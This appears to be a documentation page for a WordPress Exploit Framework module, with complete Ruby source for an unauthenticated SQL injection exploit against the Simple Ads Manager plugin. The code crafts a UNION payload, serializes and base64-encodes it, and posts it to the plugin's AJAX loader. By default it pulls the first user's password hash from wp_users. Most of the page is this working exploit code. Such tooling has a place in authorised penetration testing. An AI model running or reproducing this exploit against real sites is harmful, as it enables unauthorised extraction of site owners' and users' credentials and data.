Class: Wpxf::Auxiliary::SimpleAdsManagerSqlInjection

Inherits:
Module
  • Object
Includes:
Wpxf
Defined in:
lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb

Constant Summary

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress, #requires_authentication

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initialize ⇒ SimpleAdsManagerSqlInjection

Returns a new instance of SimpleAdsManagerSqlInjection.



# File 'lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb', line 9

# Registers the module metadata and its single 'sql' option.
#
# NOTE(review): the description names version 2.9.5.116, while #check
# passes '2.9.4.116' as the affected version and the reference URL
# contains "294116" — one of these is probably a typo; confirm against
# the advisory before relying on either.
#
# @return [SimpleAdsManagerSqlInjection] a new instance
def initialize
  super

  module_info = {
    name: 'Simple Ads Manager SQL Injection',
    desc: 'This module exploits an SQL injection in version '\
          '2.9.5.116 of the Simple Ads Manager plugin which '\
          'allows unauthenticated users to view a single field of '\
          'data at a time, such as e-mails and passwords.',
    author: [
      'Kacper Szurek', # Vulnerability discovery
      'rastating'      # WPXF module
    ],
    references: [
      ['URL', 'http://security.szurek.pl/simple-ads-manager-294116-sql-injection.html'],
      ['WPVDB', '8357']
    ],
    date: 'Dec 30 2015'
  }
  update_info(**module_info)

  # The only module-specific option: the SELECT statement that #compile_sqli
  # rewrites. The default reads one field of one row; see #valid_query? for
  # the shape it must have.
  sql_option = StringOption.new(
    name: 'sql',
    desc: 'The SQL query to execute (maximum of one field selected)',
    default: 'select user_pass from wp_users where ID = 1',
    required: true
  )
  register_options([sql_option])
end

Instance Method Details

#check ⇒ Object



# File 'lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb', line 64

# Fingerprints the plugin from its readme to decide whether the target
# looks affected. Assumes the helper's arguments are
# (plugin_name, fixed_version, introduced_version) — confirm in
# WordPress::Fingerprint.
#
# NOTE(review): '2.9.4.116' here differs from the "2.9.5.116" quoted in
# the module description (the reference URL says 294116) — confirm which
# is correct.
#
# @return [Object] whatever check_plugin_version_from_readme returns
#   (its return type is not visible in this file)
def check
  plugin_name = 'simple-ads-manager'
  fixed_version = '2.9.5.118'
  introduced_version = '2.9.4.116'
  check_plugin_version_from_readme(plugin_name, fixed_version, introduced_version)
end

#compile_sqli ⇒ Object



# File 'lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb', line 58

# Rewrites the operator-supplied SELECT (the 'sql' option) into a UNION
# fragment: the original field list is kept and 22 random numeric filler
# columns are appended before the FROM clause. Presumably the fillers bring
# the column count in line with the query the fragment lands in — that
# cannot be confirmed from this file.
#
# The pattern is case-insensitive and anchored with `^` (line start, not
# `\A`); input that is not of the shape `select <fields> from <rest>`
# passes through gsub unchanged.
#
# @return [String] the rewritten query, or the original when the pattern
#   does not match
def compile_sqli
  filler_columns = Array.new(22) { ",#{Utility::Text.rand_numeric(rand(1..3))}" }.join
  # Single-quoted so \1, \2 and \3 stay literal back-references for gsub.
  replacement = format(') UNION (\1\2%s\3', filler_columns)
  sql.gsub(/^(select\s+)(.+)(\s+from.+)/i, replacement)
end

#encoded_injection ⇒ Object



# File 'lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb', line 72

# Wraps the compiled fragment in a PHP-serialized four-element array
# (keys WC, WCT, WCW and WC2W; only WCW carries the fragment) and returns
# it base64-encoded without line breaks.
#
# The length prefix of WCW uses bytesize rather than length: PHP's
# serialized string lengths count bytes, so a multi-byte fragment would
# otherwise be truncated or rejected on the receiving side.
#
# The trailing `true` on emit_info presumably marks the message as
# verbose-only — confirm in OutputEmitters.
#
# @return [String] strict base64 of the serialized array
def encoded_injection
  compiled_sqli = compile_sqli
  emit_info "Compiled SQL: #{compiled_sqli}", true
  serialized = format(
    'a:4:{s:2:"WC";s:3:"1=0";s:3:"WCT";s:0:"";s:3:"WCW";s:%d:"%s";s:4:"WC2W";s:0:"";}',
    compiled_sqli.bytesize,
    compiled_sqli
  )
  Base64.strict_encode64(serialized)
end

#run ⇒ Object



# File 'lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb', line 81

# Runs the module: validates the 'sql' option, POSTs the encoded payload to
# the plugin's AJAX loader and reports the single value the response
# returns in its "pid" field.
#
# @return [Boolean] true when a result was reported; false when the
#   superclass run fails, the query is rejected by #valid_query?, there is
#   no (or a timed-out) response, the status is not 200 or the body is
#   blank, or the body is not valid JSON
def run
  return false unless super

  emit_info 'Validating SQL...'
  unless valid_query?
    emit_error 'Specified query appears to be invalid'
    return false
  end

  emit_info 'Preparing injection...'
  post_body = injection_post_body

  emit_info 'Executing request...'
  response = execute_post_request(url: vulnerable_url, body: post_body)

  return false unless response_usable?(response)

  report_query_result(response)
end

# Builds the form body sent to the loader; the 'wc' field carries the
# base64-encoded serialized payload from #encoded_injection (which is
# evaluated here, after the 'Preparing injection...' message).
#
# @return [Hash{String => String}]
def injection_post_body
  {
    'action' => 'load_place',
    'id' => '0',
    'pid' => '1',
    'wc' => encoded_injection
  }
end

# Rejects a missing or timed-out response, then anything that is not a
# 200 with a non-blank body, emitting the diagnostic messages as it goes.
# The two emit_info calls pass `true`, presumably verbose-only — confirm
# in OutputEmitters.
#
# @param response [Object, nil] the result of execute_post_request
# @return [Boolean] true when the response can be parsed
def response_usable?(response)
  if response.nil? || response.timed_out?
    emit_error 'No response from the target'
    return false
  end

  return true if response.code == 200 && !response.body.strip.empty?

  emit_info "Response code: #{response.code}", true
  emit_info "Response body: #{response.body}", true
  emit_error 'Failed to execute request'
  false
end

# Parses the JSON body and reports its "pid" value. Only JSON::ParserError
# is handled; any other failure (for example a body that parses to a
# non-Hash) propagates to the caller, as in the original flow.
#
# @param response [Object] a response accepted by #response_usable?
# @return [Boolean] true on success, false when the body is not JSON
def report_query_result(response)
  emit_info 'Parsing response...'
  parsed = JSON.parse(response.body)
  emit_success "Query result: #{parsed['pid']}"
  true
rescue JSON::ParserError
  emit_error 'Could not parse the response'
  false
end

#sql ⇒ Object



# File 'lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb', line 39

# The operator-supplied query from the 'sql' option, as normalized by the
# Options mixin (what "normalized" means is not visible in this file).
#
# @return [Object] the normalized option value
def sql
  option_name = 'sql'
  normalized_option_value(option_name)
end

#valid_query? ⇒ Boolean

Returns:

  • (Boolean)


# File 'lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb', line 43

# Checks that the 'sql' option has the shape `select <fields> from ...`
# (case-insensitive). The pattern uses `^`, a line anchor, rather than
# `\A`, so a multi-line value matches on any line; the option is
# operator-supplied, so no trust boundary is crossed by that.
#
# A field list containing ',' or '*' only produces a warning — the query
# is still accepted — because the injection can return just one field.
#
# @return [Boolean] false when no field list can be extracted, true
#   otherwise
def valid_query?
  field_list = sql[/^select\s+(.+)\s+from.+/i, 1]
  if field_list.nil?
    emit_error 'Could not determine the field list from the query', true
    return false
  end

  if %w[, *].any? { |token| field_list.include?(token) }
    emit_warning 'More than one field appears to have been selected. This '\
                 'can cause the query to silently fail and return no data'
  end

  true
end

#vulnerable_url ⇒ Object



# File 'lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb', line 68

# The plugin's AJAX loader script under the WordPress plugins directory —
# the endpoint #run POSTs to.
#
# @return [Object] whatever normalize_uri returns (type not visible here)
def vulnerable_url
  plugin_dir = 'simple-ads-manager'
  loader_script = 'sam-ajax-loader.php'
  normalize_uri(wordpress_url_plugins, plugin_dir, loader_script)
end